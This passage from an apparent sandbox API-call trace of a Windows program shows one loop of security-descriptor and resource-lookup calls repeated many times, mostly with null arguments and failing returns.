DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.092] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.092] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.092] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.092] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.092] LockResource (hResData=0x0) returned 0x0 [0070.092] FreeResource (hResData=0x0) returned 0 [0070.092] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.092] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.092] LockResource (hResData=0x0) returned 0x0 [0070.092] FreeResource (hResData=0x0) returned 0 [0070.092] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.092] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.092] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.092] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.092] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.092] LockResource (hResData=0x0) returned 0x0 [0070.092] FreeResource (hResData=0x0) returned 0 [0070.092] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.092] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.092] LockResource (hResData=0x0) returned 0x0 [0070.092] FreeResource (hResData=0x0) returned 0 [0070.092] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.092] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.092] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.092] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.092] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.092] LockResource (hResData=0x0) returned 0x0 [0070.092] FreeResource (hResData=0x0) returned 0 [0070.092] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.092] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.092] LockResource (hResData=0x0) returned 0x0 [0070.092] FreeResource (hResData=0x0) returned 0 [0070.092] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.092] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.092] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.092] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.092] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.092] LockResource (hResData=0x0) returned 0x0 [0070.092] FreeResource (hResData=0x0) returned 0 [0070.092] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.092] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.093] LockResource (hResData=0x0) returned 0x0 [0070.093] FreeResource (hResData=0x0) returned 0 [0070.093] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.093] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.093] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.093] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.093] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.093] LockResource (hResData=0x0) returned 0x0 [0070.093] FreeResource (hResData=0x0) returned 0 [0070.093] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.093] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.093] LockResource (hResData=0x0) returned 0x0 [0070.093] FreeResource (hResData=0x0) returned 0 [0070.093] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.093] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.093] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.093] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.093] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.093] LockResource (hResData=0x0) returned 0x0 [0070.093] FreeResource (hResData=0x0) returned 0 [0070.093] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.093] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.093] LockResource (hResData=0x0) returned 0x0 [0070.093] FreeResource (hResData=0x0) returned 0 [0070.093] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.093] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.093] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.093] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.093] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.093] LockResource (hResData=0x0) returned 0x0 [0070.093] FreeResource (hResData=0x0) returned 0 [0070.093] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.093] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.093] LockResource (hResData=0x0) returned 0x0 [0070.093] FreeResource (hResData=0x0) returned 0 [0070.093] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.093] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.093] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.093] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.093] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.093] LockResource (hResData=0x0) returned 0x0 [0070.093] FreeResource (hResData=0x0) returned 0 [0070.093] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.093] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.093] LockResource (hResData=0x0) returned 0x0 [0070.093] FreeResource (hResData=0x0) returned 0 [0070.093] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.093] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.093] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.093] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.094] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.094] LockResource (hResData=0x0) returned 0x0 [0070.094] FreeResource (hResData=0x0) returned 0 [0070.094] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.094] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.094] LockResource (hResData=0x0) returned 0x0 [0070.094] FreeResource (hResData=0x0) returned 0 [0070.094] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.094] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.094] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.094] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.094] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.094] LockResource (hResData=0x0) returned 0x0 [0070.094] FreeResource (hResData=0x0) returned 0 [0070.094] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.094] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.094] LockResource (hResData=0x0) returned 0x0 [0070.094] FreeResource (hResData=0x0) returned 0 [0070.094] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.094] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.094] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.094] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.094] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.094] LockResource (hResData=0x0) returned 0x0 [0070.094] FreeResource (hResData=0x0) returned 0 [0070.094] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.094] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.094] LockResource (hResData=0x0) returned 0x0 [0070.094] FreeResource (hResData=0x0) returned 0 [0070.094] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.094] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.094] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.094] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.094] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.094] LockResource (hResData=0x0) returned 0x0 [0070.094] FreeResource (hResData=0x0) returned 0 [0070.094] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.094] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.094] LockResource (hResData=0x0) returned 0x0 [0070.094] FreeResource (hResData=0x0) returned 0 [0070.094] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.094] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.094] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.094] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.094] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.094] LockResource (hResData=0x0) returned 0x0 [0070.094] FreeResource (hResData=0x0) returned 0 [0070.094] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.094] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.094] LockResource (hResData=0x0) returned 0x0 [0070.094] FreeResource (hResData=0x0) returned 0 [0070.095] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.095] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.095] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.095] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.095] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.095] LockResource (hResData=0x0) returned 0x0 [0070.095] FreeResource (hResData=0x0) returned 0 [0070.095] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.095] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.095] LockResource (hResData=0x0) returned 0x0 [0070.095] FreeResource (hResData=0x0) returned 0 [0070.095] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.095] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.095] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.095] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.095] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.095] LockResource (hResData=0x0) returned 0x0 [0070.095] FreeResource (hResData=0x0) returned 0 [0070.095] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.095] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.095] LockResource (hResData=0x0) returned 0x0 [0070.095] FreeResource (hResData=0x0) returned 0 [0070.095] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.095] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.095] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.095] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.095] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.095] LockResource (hResData=0x0) returned 0x0 [0070.095] FreeResource (hResData=0x0) returned 0 [0070.095] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.095] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.095] LockResource (hResData=0x0) returned 0x0 [0070.095] FreeResource (hResData=0x0) returned 0 [0070.095] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.095] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.095] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.095] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.095] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.095] LockResource (hResData=0x0) returned 0x0 [0070.095] FreeResource (hResData=0x0) returned 0 [0070.095] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.095] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.095] LockResource (hResData=0x0) returned 0x0 [0070.095] FreeResource (hResData=0x0) returned 0 [0070.095] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.096] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.096] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.096] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.096] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.096] LockResource (hResData=0x0) returned 0x0 [0070.096] FreeResource (hResData=0x0) returned 0 [0070.096] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.096] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.096] LockResource (hResData=0x0) returned 0x0 [0070.096] FreeResource (hResData=0x0) returned 0 [0070.096] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.096] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.096] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.096] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.096] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.096] LockResource (hResData=0x0) returned 0x0 [0070.096] FreeResource (hResData=0x0) returned 0 [0070.096] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.096] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.096] LockResource (hResData=0x0) returned 0x0 [0070.096] FreeResource (hResData=0x0) returned 0 [0070.096] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.096] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.096] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.096] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.096] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.096] LockResource (hResData=0x0) returned 0x0 [0070.096] FreeResource (hResData=0x0) returned 0 [0070.096] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.096] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.096] LockResource (hResData=0x0) returned 0x0 [0070.096] FreeResource (hResData=0x0) returned 0 [0070.096] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.096] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.096] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.096] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.096] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.096] LockResource (hResData=0x0) returned 0x0 [0070.096] FreeResource (hResData=0x0) returned 0 [0070.096] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.096] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.096] LockResource (hResData=0x0) returned 0x0 [0070.096] FreeResource (hResData=0x0) returned 0 [0070.096] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.096] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.096] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.096] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.096] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.096] LockResource (hResData=0x0) returned 0x0 [0070.096] FreeResource (hResData=0x0) returned 0 [0070.097] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.097] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.097] LockResource (hResData=0x0) returned 0x0 [0070.097] FreeResource (hResData=0x0) returned 0 [0070.097] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.097] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.097] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.097] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.097] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.097] LockResource (hResData=0x0) returned 0x0 [0070.097] FreeResource (hResData=0x0) returned 0 [0070.097] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.097] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.097] LockResource (hResData=0x0) returned 0x0 [0070.097] FreeResource (hResData=0x0) returned 0 [0070.097] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.097] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.097] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.097] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.097] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.097] LockResource (hResData=0x0) returned 0x0 [0070.097] FreeResource (hResData=0x0) returned 0 [0070.097] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.097] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.097] LockResource (hResData=0x0) returned 0x0 [0070.097] FreeResource (hResData=0x0) returned 0 [0070.097] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.097] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.097] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.097] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.097] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.097] LockResource (hResData=0x0) returned 0x0 [0070.097] FreeResource (hResData=0x0) returned 0 [0070.097] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.097] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.097] LockResource (hResData=0x0) returned 0x0 [0070.097] FreeResource (hResData=0x0) returned 0 [0070.097] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.097] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.097] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.097] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.097] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.097] LockResource (hResData=0x0) returned 0x0 [0070.097] FreeResource (hResData=0x0) returned 0 [0070.097] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.097] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.097] LockResource (hResData=0x0) returned 0x0 [0070.097] FreeResource (hResData=0x0) returned 0 [0070.097] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.097] 